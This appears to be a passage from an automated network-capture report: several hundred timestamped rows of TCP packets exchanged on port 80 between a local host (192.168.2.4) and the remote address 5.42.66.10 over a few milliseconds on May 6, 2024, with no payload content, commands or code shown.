May 6, 2024 07:53:04.514465094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514471054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514482021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514482975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514496088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514507055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514508963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514543056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514549017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514559031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514570951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514583111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514585018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514595032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514611959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514636040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514638901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514648914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514662027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514667988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514674902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514688015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514698029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514699936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514710903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514727116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514741898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514744043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514754057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514765024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514775038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514776945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514803886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514830112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514836073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514847994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514858961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514870882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514878035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514883041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514894962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514905930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514921904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514944077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514946938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514955997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514966965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514978886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514982939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514990091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514998913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515001059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515012980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515017986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515024900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515036106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515050888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515054941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515070915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515086889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515088081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515098095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515110016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515121937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515131950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515132904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515145063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515158892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515176058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515177965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515188932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515201092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515212059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515212059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515223980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515234947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515239000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515255928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515268087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515269995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515280962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515289068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515295029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515316010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515321016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515328884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515347004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515362978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515367985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515381098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515391111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515402079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515402079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515414000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515424013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515425920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515439034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515449047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515450954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515464067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515490055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515495062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515506029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515516996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515527010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515531063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515544891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515554905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515556097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515583038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515597105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515604019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515616894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515628099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515639067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515645027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515656948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515657902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515677929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515678883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515691996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515701056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515727043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515734911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515747070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515758038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515769005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515769958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515782118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515794039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515798092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515820026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515824080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515836000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515836000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515849113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515861034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515862942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515872955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515881062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515885115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515897989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515908957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515908957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515922070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515928984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515934944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515944004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515945911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515959024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515969992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.515971899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.515997887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516010046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516031027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516041994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516053915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516064882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516066074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516077995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516082048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516088963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516114950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516115904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516127110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516128063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516139984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516149044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516151905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516163111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516174078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516176939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516185999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516202927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516220093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516247034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516258001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516268015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516283989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516288042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516297102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516300917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516308069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516319036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516336918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516365051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516386032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516397953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516407967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516419888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516421080 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516431093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516442060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516449928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516453981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516467094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516478062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516482115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516490936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516501904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516505003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516513109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516530991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516545057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516550064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516556978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516567945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516578913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516580105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516591072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516613007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516643047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516688108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516700029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516710997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516724110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516724110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516735077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516748905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516755104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516758919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516781092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516788960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516793966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516805887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516805887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516818047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516829014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516834974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516868114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516870975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516882896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516895056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516905069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516906977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516918898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516931057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516933918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516942978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516966105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516973019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516984940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.516984940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.516997099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517008066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517015934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517019033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517031908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517043114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517045021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517054081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517066002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517069101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517091990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517110109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517144918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517155886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517167091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517179012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517180920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517190933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517201900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517206907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517214060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517225981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517240047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517246962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517251015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517262936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517270088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517275095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517287016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517287970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517299891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517313004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517319918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517324924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517345905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517349958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517359018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517368078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517369032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517381907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517401934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517430067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517462015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517473936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517484903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517497063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517503977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517508984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517519951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517533064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517534018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517558098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517569065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517575979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517580986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517591000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517602921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517606974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517615080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517627001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517628908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517638922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517648935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517659903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517661095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517673969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517682076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517684937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517695904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517699957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517730951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517745972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517756939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517771006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517782927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517812967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517827988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517838955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517848969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517863989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517868042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517877102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517884970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517889023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517918110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517944098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.517967939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517981052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.517991066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518002987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518003941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518013954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518024921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518026114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518047094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518058062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518059969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518069983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518076897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518080950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518094063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518104076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518106937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518116951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518127918 CEST	80	49741	5.42.66.10	192.168.2.4
